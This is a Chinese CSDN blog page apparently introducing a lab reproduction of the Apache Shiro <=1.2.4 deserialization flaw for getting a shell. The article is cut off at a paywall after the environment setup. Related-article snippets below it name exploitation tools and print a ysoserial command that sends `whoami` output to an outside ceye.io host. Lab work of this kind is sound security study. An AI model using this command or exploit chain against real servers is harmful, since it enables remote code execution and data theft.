shell命令查阅端口信息_Apache Shiro反序列化命令执行GetShell

最新推荐文章于 2024-02-18 22:39:39 发布
最新推荐文章于 2024-02-18 22:39:39 发布
阅读量344 收藏
点赞数
文章标签: shell命令查阅端口信息
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42545159/article/details/112199191
版权

网安引领时代,弥天点亮未来   

11d5ffa2-5831-eb11-8da9-e4434bdf6706.png

0x00写在前面

      本次测试软文仅供学习使用,如若非法他用,与本文作者无关,需自行负责!

因学未深,技未精,故水平有限,还请各位大佬勿喷!

11d5ffa2-5831-eb11-8da9-e4434bdf6706.png

0x01环境介绍

   

攻击机:192.168.60.129 (kali)

受害机:192.168.60.151

网关:192.168.60.2

工具:docker、burp、python3

Apache Shiro:

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

漏洞版本:Apache Shiro<=1.2.4

11d5ffa2-5831-eb11-8da9-e4434bdf6706.png

0x02攻击准备

 
最低0.47元/天 解锁文章
即将离开的人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SpringBoot整合Shiro学习(中)
qq_461491877的博客
11-21 887
SpringBoot整合Shiro(中) 基于【编程不良人】2020最新版Shiro教程,整合SpringBoot项目实战教程 哔哩哔哩链接:https://www.bilibili.com/video/BV1uz4y197Zm?p=1 上篇我们简单介绍了shiro的基本原理和认证和授权的实现,接下来我们将进行Shiro与jsp页面的整合开发。 六、Shrio整合JSP实战 6.1 整合思路 6.2 配置环境 1.创建项目 我们新建一个springboot项目, 配置项目信息, 引入依赖, 命名项目
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
Apache-shiro漏洞利用合集
weixin_51339377的博客
04-15 2407
这里漏洞原理不再多进行赘述 主要是测试漏洞的利用过程 漏洞1:shiro-550 CVE-2016-4437 shiro反序列化漏洞 利用版本 Apache-shiro <1.2.4 漏洞环境docker安装 docker pull medicean/vulapps:s_shiro_1 systemctl restart docker docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1 启动成功以后直接访问本地的8081端口即可
shiro简单配置
热门推荐
都是浮云
04-20 13万+
注:这里只介绍spring配置模式。 因为官方例子虽然中有更加简洁的ini配置形式,但是使用ini配置无法与spring整合。而且两种配置方法一样,只是格式不一样。 涉及的jar包 Jar包名称 版本 核心包shiro-core 1.2.0 Web相关包shiro-web 1.2.0
【网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 4539
shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
vulhub——shiro反序列化getshell漏洞复现
W小哥
11-24 5905
一、漏洞概述 Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 二、环境搭建 三、漏洞复现 访问目标网站,使用admin:vulhub进行登录 输入用户名、密码进行登录,开启burpsu
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
shiro反序列化工具,加强版
12-27
对于安全研究人员和渗透测试者,"shiro_attack-4.5.6-SNAPSHOT-all"这个工具可能是用来模拟攻击场景,检测系统是否易受反序列化漏洞影响。它可能包括了生成恶意序列化对象的脚本,或者是一套自动化测试框架,帮助...
shiro_attack:shiro反序列化进攻综合利用,包含(回显执行命令注入内存马)
03-11
shiro反序列化进攻综合利用项目基于javafx,利用shiro反序列化扩展进行回显命令执行以及注入类别内存马检出唯一密钥(SimplePrincipalCollection)cbc / gcm Tomcat / Springboot回显命令执行集成公用集合K1 / K2...
shiro反序列化复现.zip
08-03
"shiro反序列化复现.zip"这个压缩包很可能是为了帮助开发者或者安全研究人员理解并重现Apache Shiro中的反序列化漏洞。 反序列化漏洞通常发生在程序接收来自不可信源的序列化对象时,如果这个对象包含了恶意构造的...
记录一次shiro反序列化getshell
daxi0ng的博客
08-02 6980
一个站 http://wxbase.xxxxx.com/error/unauth 一个包,发现有shiro反序列化漏洞 使用ysoserial URLDNS模块探测 java -jar ysoserial.jar URLDNS "http://`whoami`.xxxx.ceye.io">payload.dat python2 shiro-encode.py # -*...
shiro反序列化漏洞复现(CVE-2016-4437)
huangyongkang666的博客
04-14 3637
shiro反序列化漏洞复现(CVE-2016-4437) 1.漏洞简介 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序 漏洞原理: 在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编
Apache Shiro-550反序列化漏洞分析
qq_61991235的博客
09-11 560
shrio550详细调试分析
shiro教程(2)- shiro介绍
好好学java
04-01 462
shiro教程系列 shiro教程(3)-shiro授权 1shiro介绍 1.1什么是shiro Shiroapache旗下一个开源框架,它将软件系统的安全认证相关的功能抽取出来,实现用户身份认证,权限授权、加密、会话管理等功能,组成了一个通用的安全认证框架。 1.2为什么要学shiro 既然shiro将安全认证相关的功能抽取出来组成一个框架,使用sh...
Shiro反序列化漏洞综合
FODKING的博客
09-07 871
Apache Shiro框架提供了记住我的功能(RememberMe),在服务器上存在反序列化漏洞。
shiro反序列化漏洞
wutiangui的博客
09-07 1990
序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,保证对象的完整性和可传递性;反序列化即逆过程,由字节流还原成对象。根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。漏洞影响版本。
Shiro反弹shell和权限绕过含工具包
最新发布
02-18 1008
【CVE-2019-12422】使用python脚本判断是否存在shiro漏洞,反弹shell漏洞利用,【CVE-2020-1957】Shiro权限绕过漏洞。
shiro 解决 跨域(仅端口不同) 登陆 问题
weixin_34117211的博客
03-31 874
1. 登陆成功设置cookie (服务端 通过 json返回 token) //设置cookie document.cookie = "JSESSIONID="+data.data.token+";path=/;domain="+urlcore.split('://')[1].split(':')[0]; 注:data.data.token 服务端返回的token ...
Apache shiro 反序列化工具
05-23
可以将该文件发送给目标应用程序,触发反序列化漏洞,执行 touch /tmp/success 命令。 除了 ysoserial,还可以使用 ShiroExploit 工具来利用 Apache Shiro 反序列化漏洞。ShiroExploit 是一个专门针对 Apache Shiro...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值